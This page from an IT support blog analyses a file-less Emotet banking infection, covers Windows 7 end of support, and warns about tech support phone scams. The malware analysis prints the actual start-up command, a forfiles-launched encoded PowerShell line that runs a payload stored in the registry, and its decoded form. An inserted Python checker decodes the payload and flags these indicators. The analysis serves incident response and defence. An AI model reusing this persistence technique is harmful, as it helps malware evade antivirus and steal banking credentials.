Analyzing File-less Banking Malware

This malware appears to have originated from an email claiming to be from the ASIC Messaging Service. It advises the user that their business name is due for renewal. The link within the email does not take the user to the ASIC website, but instead links to a website for a community newspaper. This website appears to have been compromised at some stage: a page had been added that automatically forwards the user to another malicious website, and that is where the malware was downloaded onto the client's PC.

For those who are interested in the more technical details, I won't link directly to the pages, but the VirusTotal page for the original link can be found here. The link it redirects to is no longer available, but the VirusTotal page can be viewed here. The second link has been marked by a member of the VirusTotal community as ASIC phishing/malware.

I was investigating the malware infection for a client after the fact. At the time the client clicked the link (browser history verified the link was clicked), a JavaScript file appears to have been downloaded onto the machine. VirusTotal and Hybrid Analysis links.

It is easy to blame the victim in these cases, but some phishing emails have become so well put together that anyone could fall for it.

The client had noticed that, after this time, a command prompt window would flash up on the screen upon Windows start-up.

There was also a line at the bottom that I missed in the screenshot that read:

ERROR: Access is denied for “C:\WINDOWS\System32\winevt\”

At this time the client's bank contacted them to advise that their PC was infected with a banking Trojan.

Removing File-less Banking Malware

I had no luck removing the malware with KVRT and had to proceed with a manual approach. ESET, my go-to AV, did not detect the malware, nor did Windows Defender.

KVRT showed the infection as:

MEM:Trojan-Banker.multi.Emotet.gen.

Upon inspecting the start-up entries, a command that utilizes a trusted Windows executable was found to be set to run at each boot.

The command was:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAXABJAGQAZQBuAHQAaQB0AGkAZQBzAFwAewA0ADYANABBAEUARABGADUALQAwADUAQwA3AC0AQgA2ADYAMQAtADEANwAxADIALQBBADkANQA5ADcAOAAyADkAQgBFADQARAB9ACcAKQAuAFQA"

When the Base64 text is decoded, the command is:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c "cmd /c @file -ec iex (gp 'HKCU:\\Identities\{464AEDF5-05C7-B661-1712-A9597829BE4D}').T"

Base64 text can be decoded using certutil, found in C:\WINDOWS\System32\.

i.e. certutil.exe -decode encoded.txt decoded.txt

Base64 can also be decoded using an online service such as https://www.base64decode.org/.

Forfiles has been set to run at each start-up and load the malware from the registry into memory. This avoids writing anything to disk and helps the malware evade detection.
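As an added example (my own script, not anything from the original investigation), this Python checker decodes the -ec payload the way PowerShell does, as Base64 over UTF-16LE, which is also why a raw certutil -decode of the same string produces a file with a NUL byte after every letter, and flags the indicators described above in a start-up command line. The indicator names and the regular expressions are my own assumptions; the command it analyses is the one recovered above.

```python
import base64
import re

# Start-up command recovered on the page (quotes straightened). forfiles
# expands p*ll.*e under System32 to powershell.exe and substitutes it for
# @file, so "powershell" never appears literally in the autorun entry.
PAGE_COMMAND = (
    'forfiles /s /p C:\\WINDOWS\\System32 /m p*ll.*e /c "cmd /c @file -ec '
    'aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAXABJAGQAZQBuAHQAaQB0AGkAZQBzAFwA'
    'ewA0ADYANABBAEUARABGADUALQAwADUAQwA3AC0AQgA2ADYAMQAtADEANwAxADIALQBBADkA'
    'NQA5ADcAOAAyADkAQgBFADQARAB9ACcAKQAuAFQA"'
)

# -e, -ec, -enc and -EncodedCommand all select the Base64 argument.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -ec payload: Base64 over UTF-16LE text.

    A plain 'certutil -decode' of the same string yields a file with a NUL
    byte after every letter; decoding it as UTF-16LE gives the script.
    """
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def analyze_autorun(cmd: str) -> dict:
    """Flag the indicators described on the page in one start-up command."""
    match = ENCODED_ARG.search(cmd)
    decoded = decode_encoded_command(match.group(1)) if match else ""
    return {
        # trusted Windows binary used as a launcher for something else
        "forfiles_proxy": bool(re.search(r"\bforfiles\b.*@file", cmd, re.I)),
        # wildcard in /m hides the real executable name
        "wildcard_exe": bool(re.search(r"/m\s+\S*\*\S*", cmd, re.I)),
        "encoded_command": match is not None,
        "decoded": decoded,
        # payload read from a registry value rather than a file on disk
        "registry_payload": bool(re.search(
            r"\b(gp|Get-ItemProperty)\b.*\bHK(CU|LM)\b", decoded, re.I)),
        # decoded text executed straight from memory
        "invoke_expression": bool(re.search(
            r"\b(iex|Invoke-Expression)\b", decoded, re.I)),
    }


def indicator_count(findings: dict) -> int:
    """Number of indicators that fired (the decoded text itself is not one)."""
    return sum(1 for key, hit in findings.items() if key != "decoded" and hit)
```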

While I didn’t analyse exactly what EMOTET was doing, banking malware is designed to steal login credentials. The password is captured when you log into your bank and is sent back to a server that the attacker controls. Often with banking malware, screenshots are also taken to allow the attacker to capture other information such as funds available and account numbers.

Protecting yourself

Antivirus is not the magical safeguard it is often made out to be. It is still a great idea to have some kind of antivirus running on your device, but there are other tasks you can do to protect yourself or your business.

Train against phishing – It is simple for most home users; don’t click links, and avoid attachments from people you don’t know. But for business users, it is a little harder. Many staff members’ jobs involve clicking links and opening attachments. This is why user training is important. Take a Phishing IQ Test.

Remove administrator privileges – I have covered this previously. Taking away administrator privileges can often limit what foothold malware can gain on your device.

Keep your software up to date – Some malware will exploit known vulnerabilities in your operating system or software. Windows users can install updates for the operating system via Windows Update (Windows Key + R, type control update, press Enter, and click Check for updates). Other software can be easily updated using Patch My PC.

Ask for help – If you receive an email that does not seem right, call a trusted friend or ask a colleague (if your business has in-house IT staff, start there). Sometimes talking out loud will help you tell whether something is genuine or not.

Read our other articles and share with your friends – I have covered many other tech tips topics. Read them and share them with your friends.

Windows 7 End of Extended Support

Windows 7 was first released to the public on October 22nd, 2009. As with most software released by Microsoft, its life cycle is roughly 10 years.

Microsoft support their products for the first 5 years under mainstream support. The software will receive new features, complimentary phone support, and patches for vulnerabilities. Mainstream support ended for Windows 7 on January 13th, 2015. The product then moved into extended support.

With extended support, the product continues to receive patches for vulnerabilities to keep the device secure. The software no longer receives new features and users no longer receive complimentary phone support. Extended Support for Windows 7 will continue until January 12th, 2020 – which at time of writing is about 14 months.

Windows 7 will still work after extended support ends, but you will be left vulnerable to any zero-day vulnerabilities that are discovered after the support cut-off. A cyber criminal could exploit these vulnerabilities to gain access to your personal data, or use your device and bandwidth for illegal activities.

What should you do?

Plan to upgrade well before the extended support period ends. If you had opted in to receive the Windows 10 upgrade when it was first released, installing this now would be your cheapest option to stay up to date.

Windows 10 can be purchased and installed via an in-place upgrade if you missed the free upgrade. This varies in price depending on the version you require.

Any device that runs Windows 7 should run Windows 10. If you find your device is getting slow, it may be a good time to look at upgrading to something with higher specs that already has Windows 10 installed.

If buying a new device is out of your range, there are plenty of lightweight Linux distributions available. Linux Mint, or Lubuntu are both easy to use and work well on older hardware. Linux distributions come packed with plenty of software, so you can hit the ground running.

Whatever route you take, don’t leave it to the last minute. Start planning your upgrade now to ensure that you are going to keep your devices secure and safe from malware or cyber criminals.

Tech Support Scam (Update September 2018)

Tech support scams have made a resurgence in Grenfell. The scam is nothing new, and the same old scare tactics are being implemented.

Usually, an unsolicited call from a person claiming to be a representative of Telstra, or another well-known company, will claim that your computer has been hacked.

Another tactic being used is an automated call advising you that your “internet has been compromised” and that it will be cut off if you don’t act promptly. You are then required to call the scammer yourself.

The first thing to note here is that Telstra, Microsoft, or any of the other companies that the caller claims to be, will not call you out of the blue to help with your “hacked” device.

Often with these calls, you will notice a delay before you can hear the person on the other end. This can be an indication that the caller may be a scammer.

The scammer will talk you through the steps to open Windows Event Viewer. Event Viewer keeps logs of what is happening on your machine. This includes a section that shows all the errors that have occurred on your device.

It is a simple program to open: hold the Windows key and press R, type in eventvwr and press Enter.

To the end user, the number of errors in Event Viewer looks to be of concern – and that is what the scammer is preying on.

Unless you are having noticeable trouble with your device, the errors should not be of any concern.

They are not “hacking attempts” as the scammer will try to tell you.

If, so far, the scammer has convinced you that he is legitimate, you will be talked through installing a remote access tool such as Team Viewer.

There are many other remote access tools that have been used.

These remote access tools are legitimate programs and will not be flagged as malicious by your antivirus. The scammer is just using the tool for malicious purposes. Much like a brick is used to build a house, it can also be used as a “tool” to break into a house.

The scammer’s tactics vary from this point onward.

In some cases the scammer will ask for access to the victim’s bank account, the premise being that hackers are trying to break in. Once the victim logs in on behalf of the scammer, the scammer is then able to transfer funds to his own accounts.

Other scammers have installed free software to “fix” the device, after which they charge a fee – in some cases up to $1200.

Once you have allowed remote access to your machine, there is nothing stopping the scammer from setting up a backdoor, stealing personal data, or from simply deleting files.

Whatever the outcome, it is all bad for the victim.

What can you do to avoid these scams

Caller ID: If your phone supports caller ID, screen your calls. If you do not recognize the number, or the number is private, don’t answer the phone.

Of course, use this to your discretion. If you are expecting a call this week from the doctors, you may need to answer that private caller.

Don’t call back: Ignore the automated message advising you to call back on a certain number. This tactic makes the scammer’s work a lot easier because you have called them and essentially lowered your guard. Sometimes the numbers can be a premium service, meaning you may be paying per minute to talk to them.

Call a Friend: If you do get a call and you are not sure, use your mobile (if you have one) and call a trusted friend or family member. Sometimes just talking out loud to someone else will help the scam stand out.

Obtain a Silent Number: Telstra have removed the fees associated with having a silent number. This keeps your details out of the White Pages and online directories. Fees may still apply with other telephone providers. To activate this, call your telephone provider.

Register on the Do Not Call Register: This isn’t going to stop a malicious caller, but it will prevent some of the legitimate (but still annoying) telemarketing calls.

Educate your friends and family: Share this article with your friends and family. The more we talk about the scams going around, the less likely we are to fall for them.

Scamwatch is run by the ACCC. It provides information to consumers and small businesses about how to recognise, avoid, and report scams.

Our Tech Tips articles also have great tips on protecting yourself online, so do check them out as well.
